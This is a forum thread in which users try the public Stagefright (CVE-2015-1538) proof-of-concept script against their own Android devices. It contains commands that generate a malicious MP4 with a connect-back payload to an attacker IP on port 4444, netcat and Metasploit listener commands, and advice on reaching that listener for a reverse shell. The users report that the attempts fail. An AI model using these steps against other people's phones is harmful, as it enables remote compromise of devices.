Jump to content

Android Stagefright CVE-2015-1538.py


0v3rl04d
 Share

Recommended Posts

Hi guys,

after the discovery of the Stagefright bug, the researcher of Zimperium have post a python script for the specific module CVE 1538.

I've download it and i've try to execute this on my Android phone with Lollipop 5.0. Before this, i've downloaded the apk of zimperium to test if my phone is vulnerable.

The app show me, in green, the module CVE-1538 e other... After this, on my linux pc with python 2.7.x, i've renamed the script in mp4.py for resolve an error of import.

After this i've tried to generate the file.mp4 with this command:

$python2 mp4.py -c [LAN IP] -p 4444

The script correctly generate an file.mp4 without an error.

After i've launch a listener with:

$netcat -l -p 4444

I've sended the file.mp4 to my smartphone and i've tried to exec this.

The terminal with netcat don't show anything, no result, nisba, nada... I've tried with metasploit listener with multi/hanlder but with a same result.

Any solution? Thanks everyone and sorry for my english ;-P

Link to comment
Share on other sites

I would assume the same thing Cooper said, that if you are in green for "CVE-1538" specifically, you are only vulnerable to the attacks that fall under the other CVE's that are listed in red. Other thing to consider, that if you are vulnerable, maybe the listener doesn't see anything because it can't reach your machine from the phone, which may need port forwarding and such in place to see the reply from the phone.

Test everything is working for the listener first, connect locally from another machine to your listener. If works locally, then try from the internet, such as setting up a fake web page and then connecting over yoru browser.

ex:

cat sometextfile.txt | nc -l -p 4444

(Or if on windows)

‚Äčtype sometextfile.txt | nc -l -p 4444

And then in your browser, connect to your local IP using http://your.local.ip/and your internet based IP (Type "ip" by itself into google to get your external IP) you should see the output of your text file in your web browser. if that works locally and remote, then you should see whatever the phone is supposed to send back to you. Get the listener working first, then you can test if the code works against your phone. If it doens't send back a shell or whatever prompt it's supposed to show from the phone, then you probably aren't vulnerable.

Link to comment
Share on other sites

  • 2 weeks later...

Thank you, is very simple and good test for netcat. I did't know it! I've tested locally and remotely and both work well!

So probably my phone isn't vulnerable... I'll try with another phone...

People wanted me to do a video on this the public exploit released doesn't work for my Nexus 7 2013 tablet even though the detector claims my tablet is vulnerable renamed the python script to mp4.py that part works when making the mp4 set my chost and set my cback port made the mp4 called test.mp4 placed it on my kali apache server started a nc -l -p 4444 went to my kali webserver to run the mp4 nothing happens :B no connect back on netcat so :B

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...